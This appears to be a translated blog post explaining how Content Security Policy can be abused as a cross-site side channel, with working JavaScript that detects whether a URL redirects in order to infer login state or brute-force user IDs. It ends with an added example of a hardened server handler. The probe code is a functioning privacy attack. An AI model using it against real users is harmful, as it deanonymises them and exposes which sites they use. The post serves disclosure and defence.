
Content Security Policy for evil

There is a special header for securing websites: Content Security Policy (CSP).

CSP restricts the loading of any resource that was not pre-approved in the header, which makes it excellent protection against XSS: the attacker cannot load a third-party script, and inline scripts are disabled as well.

At the browser level you can allow only specific URLs to load; everything else is blocked. Besides its benefits, this mechanism can also do harm: the fact of blocking is itself a detection signal. It only remains to figure out how to apply it.

```javascript
// Probe whether `url` is redirected. The framed document carries a CSP that
// allows images only from `url` itself (query string stripped); if the
// server redirects the request anywhere else, CSP blocks the load.
// Requires an <iframe id="playground"> on the page.
function does_redirect(url, cb) {
  var allowed = url.split('?')[0];
  var frame = document.getElementById('playground');
  window.cb = cb;
  // No event within 3 s: report false.
  window.tm = setTimeout(function () { window.cb(false); }, 3000);
  frame.src = 'data:text/html,<meta http-equiv="Content-Security-Policy" content="img-src ' + allowed + ';">' +
    '<img src="' + url + '" onerror=parent.postMessage(1,"*") onload=parent.postMessage(2,"*")>';
}

// The framed document reports 1 (onerror) or 2 (onload) back to the parent.
window.addEventListener('message', function (e) {
  clearTimeout(window.tm);
  window.cb(e.data);
});
```

We can find out whether a specific URL redirects to another, and in some cases even recover a specific URL by brute force, say over the range 1 to a million (more than that takes too long).

Try the demo page.

The coolest thing about this bug is that it cannot be fixed "correctly". It is based on detecting whether the resource was loaded or not, and CSP's job is to block the resource, which prevents it from loading. The only solution I see is to "emulate" onload events; one could try redirecting to a data: URL, as was done for my similar bug in XSS Auditor (an interesting bug, by the way, and still not fixed).
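As an added example that is not part of the original post, the following models the probe's allowed-vs-blocked outcome beside the server-side pattern it exploits (a redirect that depends on login state) and a hardened handler whose response stays at the same URL in both states. The session ids, URLs and handlers are constructed for illustration.

```javascript
// Added example (not the original post's code): model of the CSP probe, a
// vulnerable handler and a hardened one. All names here are constructed.

// Constructed session table: a userId means the visitor is logged in.
const SESSIONS = { 'sess-alice': { userId: 1337 }, 'sess-anon': null };

// Model of the probe: img-src allows exactly the probed URL (query stripped),
// so a redirect anywhere else is blocked, while a response served at the
// probed URL is allowed. Only allowed vs blocked is tracked, which is the
// signal the post describes.
function cspOutcome(probeUrl, response) {
  const allowed = probeUrl.split('?')[0];
  if (response.status >= 300 && response.status < 400) {
    const target = new URL(response.location, probeUrl).href.split('?')[0];
    return target === allowed ? 'allowed' : 'blocked';
  }
  return 'allowed';
}

// Vulnerable handler: the final URL of the response depends on login state.
// /me/profile answers 200 for a logged-in user and 302 -> /login otherwise.
function profileVulnerable(sessionId) {
  const session = SESSIONS[sessionId];
  if (!session) return { status: 302, location: '/login' };
  return { status: 200, body: `profile of user ${session.userId}` };
}

// Hardened handler: never redirect based on authentication. The anonymous
// visitor gets a 401 page rendered at the same URL, so CSP sees the same URL
// in both states. (For endpoints that serve images, answer with a placeholder
// image rather than a redirect, for the same reason.)
function profileHardened(sessionId) {
  const session = SESSIONS[sessionId];
  if (!session) return { status: 401, body: 'please log in' };
  return { status: 200, body: `profile of user ${session.userId}` };
}

// Self-check: does the probe's outcome differ between a logged-in and an
// anonymous request to the same URL?
function leaksLoginState(handler, probeUrl) {
  const loggedIn = cspOutcome(probeUrl, handler('sess-alice'));
  const anon = cspOutcome(probeUrl, handler('sess-anon'));
  return loggedIn !== anon;
}

console.log(leaksLoginState(profileVulnerable, 'https://example.test/me/profile')); // true
console.log(leaksLoginState(profileHardened, 'https://example.test/me/profile'));   // false
```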

At the moment no protection has been implemented, which means that for a long time we will be able to detect the user ID on many resources, and whether someone is a user of SomeSite. It works in Firefox, Safari and Chrome; support in IE is very limited, but they will fix that soon.

Source: https://habr.com/ru/post/211370/
